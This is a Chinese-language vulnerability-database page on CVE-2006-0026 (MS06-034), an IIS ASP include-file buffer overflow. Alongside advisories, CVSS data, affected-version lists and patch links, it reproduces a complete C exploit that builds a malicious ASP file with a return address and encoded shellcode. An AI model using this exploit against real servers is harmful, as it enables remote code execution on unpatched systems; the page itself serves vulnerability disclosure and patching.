CVE-2006-0026
CVSS6.5
发布时间 :2006-07-11 18:05:00
修订时间 :2011-03-07 21:29:11
NMCOEPS    

[原文]Buffer overflow in Microsoft Internet Information Services (IIS) 5.0, 5.1, and 6.0 allows local and possibly remote attackers to execute arbitrary code via crafted Active Server Pages (ASP).


[CNNVD]Microsoft IIS ASP远程缓冲区溢出漏洞(MS06-034)(CNNVD-200607-145)

        Microsoft IIS是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。
        IIS实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        IIS的ASP.DLL的include函数检查参数是否大于260个字节。如果大于的话就会报错,但在报错之前执行了错误的计算。
         mov edi, [ebp+var_228] ; load length of parameter
         cmp edi, 104h ; check if larger than 260 bytes
         jbe short loc_
         mov esi, [ebp+var_22C] ; load address of parameter
         lea eax, [edi+esi-104h] ; load eax with the address of the last
         ; 260 bytes of the parameter
         ; (length of string+source of string)-
        104h
         lea edx, [ebp+var_211] ; load edx with address on stack
         sub edx, eax ;
         mov cl, [eax] ; \
         mov [edx+eax], cl ; do the copy
         inc eax ; and overflow the stack
         test cl, cl ; /
         jnz short loc_7096D1F3 ;
        攻击者可以通过创建特制的Active Server Pages(ASP)文件来利用这个漏洞,如果IIS处理了该文件的话就会导致执行任意指令。利用这个漏洞必须有效的登录凭据,成功利用这个漏洞的攻击者可以当前用户权限执行指令。
        
        

- CVSS (基础分值)

CVSS分值: 6.5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:internet_information_server:6.0Microsoft IIS 6.0
cpe:/a:microsoft:internet_information_server:5.1Microsoft IIS 5.1
cpe:/a:microsoft:internet_information_server:5.0

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:435Internet Information Services using Malformed Active Server Pages Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0026
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0026
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-145
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/395588
(PATCH)  CERT-VN  VU#395588
http://www.us-cert.gov/cas/techalerts/TA06-192A.html
(UNKNOWN)  CERT  TA06-192A
http://xforce.iss.net/xforce/xfdb/26796
(PATCH)  XF  iis-asp-bo(26796)
http://www.securityfocus.com/bid/18858
(PATCH)  BID  18858
http://www.microsoft.com/technet/security/bulletin/ms06-034.mspx
(VENDOR_ADVISORY)  MS  MS06-034
http://securitytracker.com/id?1016466
(PATCH)  SECTRACK  1016466
http://secunia.com/advisories/21006
(VENDOR_ADVISORY)  SECUNIA  21006
http://www.vupen.com/english/advisories/2006/2752
(UNKNOWN)  VUPEN  ADV-2006-2752
http://www.osvdb.org/27152
(UNKNOWN)  OSVDB  27152
http://archives.neohapsis.com/archives/bugtraq/2006-07/0316.html
(UNKNOWN)  BUGTRAQ  20060718 ASP.DLL Include File Buffer Overflow

- 漏洞信息

Microsoft IIS ASP远程缓冲区溢出漏洞(MS06-034)
中危 缓冲区溢出
2006-07-11 00:00:00 2006-07-12 00:00:00
远程  
        Microsoft IIS是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。
        IIS实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        IIS的ASP.DLL的include函数检查参数是否大于260个字节。如果大于的话就会报错,但在报错之前执行了错误的计算。
         mov edi, [ebp+var_228] ; load length of parameter
         cmp edi, 104h ; check if larger than 260 bytes
         jbe short loc_
         mov esi, [ebp+var_22C] ; load address of parameter
         lea eax, [edi+esi-104h] ; load eax with the address of the last
         ; 260 bytes of the parameter
         ; (length of string+source of string)-
        104h
         lea edx, [ebp+var_211] ; load edx with address on stack
         sub edx, eax ;
         mov cl, [eax] ; \
         mov [edx+eax], cl ; do the copy
         inc eax ; and overflow the stack
         test cl, cl ; /
         jnz short loc_7096D1F3 ;
        攻击者可以通过创建特制的Active Server Pages(ASP)文件来利用这个漏洞,如果IIS处理了该文件的话就会导致执行任意指令。利用这个漏洞必须有效的登录凭据,成功利用这个漏洞的攻击者可以当前用户权限执行指令。
        
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.microsoft.com/technet/security/bulletin/ms06-034.mspx

- 漏洞信息 (2056)

Microsoft IIS ASP Stack Overflow Exploit (MS06-034) (EDBID:2056)
windows local
2006-07-21 Verified
0 cocoruder
N/A [点击下载]
#include <stdio.h>
#include <windows.h>

/***********************************************************************
Microsoft IIS ASP Stack Overflow Exploit(MS06-034)

by cocoruder(frankruder_at_hotmail.com),2006/7/13
page:http://ruder.cdut.net/default.asp

successfully test on Windows 2000 Server SP4+IIS5.0,
On Windows 2003 Server+IIS6.0,because the new SEH protection mechanisms,
you should set the new fs:[0]->hander flexibility,this need some luck.

usage:
upload the "exploit2000.asp" to IIS web directory,use web
browser to visit it,then the shellcode will execute.

************************************************************************/




//include asp filename length=10ch>104h
unsigned char asp_include_header[]=
"<!--#include file=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.asp\"-->";

//jmp 8
unsigned char code_jmp8[]=
"\xEB\x06\x90\x90";

//jmp ebx address
unsigned char addr_jmp_ebx[]=
"\x66\x4A\xE6\x77";

// shellcode !! Must be free of Unicode null terminators (0x0000) !!
// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x46\x42\x30\x5a";



void main(void)
{
FILE *fp=NULL;
int i;

printf("[+] Creating file...exploit.asp\n");


if ((fp=fopen("exploit2000.asp","wb"))==NULL)
{
printf("fopen error!\n");
return;
}


fwrite(asp_include_header,sizeof(asp_include_header)-1,1,fp);

//fill
for (i=0;i<0x135;i++)
{
fwrite("\x41",1,1,fp);
}

fwrite(code_jmp8,4,1,fp);

fwrite(addr_jmp_ebx,4,1,fp);

fwrite(shellcode,sizeof(shellcode)-1,1,fp);

//fill
for (i=0;i<0x1500;i++)
{
fwrite("\x41",1,1,fp);
}

fclose(fp);


printf("[+] Exploit file has been successfully built.\n");

}

# milw0rm.com [2006-07-21]
		

- 漏洞信息 (F48187)

Technical Cyber Security Alert 2006-192A (PacketStormID:F48187)
2006-07-12 00:00:00
US-CERT  us-cert.gov
advisory,remote,denial of service,arbitrary,vulnerability
windows
CVE-2006-0026,CVE-2006-1314,CVE-2006-2372,CVE-2006-3059,CVE-2006-1316,CVE-2006-1540,CVE-2006-2389,CVE-2006-0033,CVE-2006-0007
[点击下载]

Technical Cyber Security Alert TA06-192A - Microsoft has released updates that address critical vulnerabilities in Microsoft Windows, IIS, and Office. Exploitation of these vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code or cause a denial of service on a vulnerable system.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

                        National Cyber Alert System

                Technical Cyber Security Alert TA06-192A


Microsoft Windows, Office, and IIS Vulnerabilities

   Original release date: July 11, 2006
   Last revised: --
   Source: US-CERT


Systems Affected

     * Microsoft Windows
     * Microsoft Internet Information Services (IIS)
     * Microsoft Office
     * Microsoft Office for Mac
     * Microsoft Access
     * Microsoft Excel and Excel Viewer
     * Microsoft FrontPage
     * Microsoft InfoPath
     * Microsoft OneNote
     * Microsoft Outlook
     * Microsoft PowerPoint
     * Microsoft Project
     * Microsoft Publisher
     * Microsoft Visio
     * Microsoft Word and Word Viewer


Overview

   Microsoft has released updates that address critical vulnerabilities
   in Microsoft Windows, IIS, and Office. Exploitation of these
   vulnerabilities could allow a remote, unauthenticated attacker to
   execute arbitrary code or cause a denial of service on a vulnerable
   system.


I. Description

   Microsoft Security Bulletin Summary for July 2006 addresses
   vulnerabilities in Microsoft products including Windows, IIS, and
   Office. Further information is available in the following US-CERT
   Vulnerability Notes:


   VU#395588 - Microsoft Internet Information Services vulnerable to
   remote code execution via specially crafted ASP file 

   Microsoft Internet Information Services (IIS) contains a buffer
   overflow vulnerability. This may allow a remote, authenticated
   attacker to execute arbitrary code on a vulnerable system.
   (CVE-2006-0026)


   VU#189140 - Microsoft Server Service Mailslot vulnerable to heap
   overflow 

   A buffer overflow vulnerability in the Microsoft mailslot server
   service may allow a remote attacker to execute arbitrary code on a
   vulnerable system.
   (CVE-2006-1314)


   VU#257164 - Microsoft DHCP Client service contains a buffer overflow 

   Microsoft DHCP Client service contains a buffer overflow. This
   vulnerability may allow a remote attacker to execute arbitrary code on
   a vulnerable system.
   (CVE-2006-2372)


   VU#802324 - Microsoft Excel vulnerability 

   An unspecified vulnerability in Microsoft Excel could allow an
   attacker to execute arbitrary code on a vulnerable system.
   (CVE-2006-3059)


   VU#580036 - Microsoft Office fails to properly handle malformed
   strings 

   Microsoft Office fails to properly handle specially crafted strings.
   This vulnerability could allow a remote attacker to execute arbitrary
   code.
   (CVE-2006-1316)


   VU#609868 - Microsoft Office string parsing vulnerability 

   Microsoft Office fails to properly parse strings. This vulnerability
   could allow a remote attacker to execute arbitrary code.
   (CVE-2006-1540)


   VU#409316 - Microsoft Office fails to properly handle document
   properties 

   Microsoft Office contains a buffer overflow when handling specially
   crafted document properties. This vulnerability could allow a remote
   attacker to execute arbitrary code.
   (CVE-2006-2389)


   VU#459388 - Microsoft Office fails to properly handle PNG images 

   Microsoft Office applications fail to properly handle PNG images. This
   vulnerability may allow a remote attacker to execute arbitrary code on
   a vulnerable system.
   (CVE-2006-0033)


   VU#668564 - Microsoft Office fails to properly handle GIF images 

   Microsoft Office applications fail to properly handle GIF images. This
   vulnerability may allow a remote attacker to execute arbitrary code on
   a vulnerable system.
   (CVE-2006-0007)


   In MS06-037, Microsoft has released updates for the Excel
   vulnerability (VU#802324) described in Technical Cyber Security Alert
   TA06-167A.


II. Impact

   A remote, unauthenticated attacker could execute arbitrary code on a
   vulnerable system. An attacker may also be able to cause a denial of
   service.


III. Solution

Apply a patch from your vendor

   Microsoft has provided updates for these vulnerabilities in the
   Security Bulletins. Updates for Microsoft Windows and Microsoft Office
   XP and later are available on the Microsoft Update site. Microsoft
   Office 2000 updates are available on the Microsoft Office Update site.
   Apple Mac OS X users should obtain updates from the Mactopia web site.

   System administrators may wish to consider using Windows Server Update
   Services (WSUS).

Workaround

   Please see the following Vulnerability Notes for workarounds.


Appendix A. References

     * Microsoft Security Bulletin Summary for July 2006 -
       <http://www.microsoft.com/technet/security/bulletin/ms06-jul.mspx>

     * Technical Cyber Security Alert TA06-167A -
       <http://www.us-cert.gov/cas/techalerts/TA06-167A.html>

     * US-CERT Vulnerability Notes for Microsoft July 2006 updates -
       <http://www.kb.cert.org/vuls/byid?searchview&query=ms06-jul>

     * US-CERT Vulnerability Note VU#395588 -
       <http://www.kb.cert.org/vuls/id/395588>

     * US-CERT Vulnerability Note VU#189140 -
       <http://www.kb.cert.org/vuls/id/189140>

     * US-CERT Vulnerability Note VU#257164 -
       <http://www.kb.cert.org/vuls/id/257164>

     * US-CERT Vulnerability Note VU#802324 -
       <http://www.kb.cert.org/vuls/id/802324>

     * US-CERT Vulnerability Note VU#580036 -
       <http://www.kb.cert.org/vuls/id/580036>

     * US-CERT Vulnerability Note VU#609868 -
       <http://www.kb.cert.org/vuls/id/609868>

     * US-CERT Vulnerability Note VU#409316 -
       <http://www.kb.cert.org/vuls/id/409316>

     * US-CERT Vulnerability Note VU#459388 -
       <http://www.kb.cert.org/vuls/id/459388>

     * US-CERT Vulnerability Note VU#668564 -
       <http://www.kb.cert.org/vuls/id/668564>

     * CVE-2006-0026 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0026>

     * CVE-2006-1314 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1314>

     * CVE-2006-2372 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2372>

     * CVE-2006-3059 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3059>

     * CVE-2006-1316 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1316>

     * CVE-2006-1540 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1540>

     * CVE-2006-2389 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2389>

     * CVE-2006-0033 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0033>

     * CVE-2006-0007 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0007>

     * Microsoft Update - <https://update.microsoft.com/microsoftupdate>

     * Microsoft Office Update - <http://officeupdate.microsoft.com>

     * Mactopia - <http://www.microsoft.com/mac>

     * Windows Server Update Services -
       <http://www.microsoft.com/windowsserversystem/updateservices/default.mspx>


 ____________________________________________________________________

   The most recent version of this document can be found at:

     <http://www.us-cert.gov/cas/techalerts/TA06-192A.html>
 ____________________________________________________________________

   Feedback can be directed to US-CERT Technical Staff. Please send
   email to <cert@cert.org> with "TA06-192A Feedback VU#802324" in the
   subject.
 ____________________________________________________________________

   For instructions on subscribing to or unsubscribing from this
   mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
 ____________________________________________________________________

   Produced 2006 by US-CERT, a government organization.

   Terms of use:

     <http://www.us-cert.gov/legal.html>
 ____________________________________________________________________


   Revision History

   July 11, 2006: Initial release


    


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iQEVAwUBRLQsLn0pj593lg50AQLyjQf/blQM+kdtxI5/dQ/Njj99QuR3yBT9ERwJ
QfZgOr8yN4rUhOU1xkXq6go7E1W4kfwuKVwwobLuYXk9Cq6xP4aVpt0/ws53wNHI
iAvJ1rURSFcVwDAXKvbiv7mmjORA36R5M37JiwR0ny76f20yZaz8LTjMbhwSLyFR
Cj7kPE0o6Fu0uUwI7ETskfcK4iF0PVoVW2mava1YG8zFuby/A+Ps7ddQvu/EcaxP
Y12QXtCP1jsB3+iJKAh7aQAh9h8aV6nuq4NZyFAHmao8iQo7qd9BMG451xTPDxn3
PoM2y5R0bXko+E4hWudpjel/JABm+nIV3R9il1QDantUI0aCqTDS9A==
=7GPc
-----END PGP SIGNATURE-----
    

- 漏洞信息

27152
Microsoft Windows IIS ASP Page Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Unknown Vendor Verified

- 漏洞描述

A remote overflow exists in Windows. Internet Information Services (IIS) fails to validate Active Server Pages (ASP) files resulting in a buffer overflow. With a specially crafted ASP file, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-07-11 Unknow
Unknow 2006-07-11

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft IIS ASP Remote Code Execution Vulnerability
Boundary Condition Error 18858
Yes No
2006-07-11 12:00:00 2006-07-27 05:17:00
Brett Moore of Security-Assessment.com discovered this vulnerability.

- 受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft IIS 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Datacenter Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Enterprise Edition Itanium 0
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows Server 2003 Web Edition
Microsoft IIS 5.1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
+ Microsoft Windows XP 64-bit Edition SP1
+ Microsoft Windows XP 64-bit Edition
+ Microsoft Windows XP 64-bit Edition
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Home
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional SP1
+ Microsoft Windows XP Professional
+ Microsoft Windows XP Professional
Microsoft IIS 5.0
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
+ Microsoft Windows 2000 Professional
+ Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
+ Microsoft Windows 2000 Server
+ Microsoft Windows 2000 Server

- 漏洞讨论

Microsoft Internet Information Server (IIS) is prone to a remote code-execution vulnerability because it fails to properly bounds-check user-supplied input before copying it to an insufficiently sized memory buffer.

To exploit this issue, attackers must be able to place and execute malicious ASP pages on computers running the affected ASP server software. This may be an issue in shared-hosting environments.

This issue allows remote attackers to execute arbitrary machine code in the context of the affected webserver software.

- 漏洞利用

The following script code may be used to demonstrate this issue:

<!-- #include file="<long buffer>">

The following exploit code is available:

- 解决方案

Microsoft has released an advisory along with fixes to address this issue.


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows Server 2003 Datacenter x64 Edition

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows Server 2003 Enterprise Edition Itanium SP1

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows XP Home SP2

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 Web Edition SP1

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP Professional SP2

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP4

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows XP Professional SP1

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站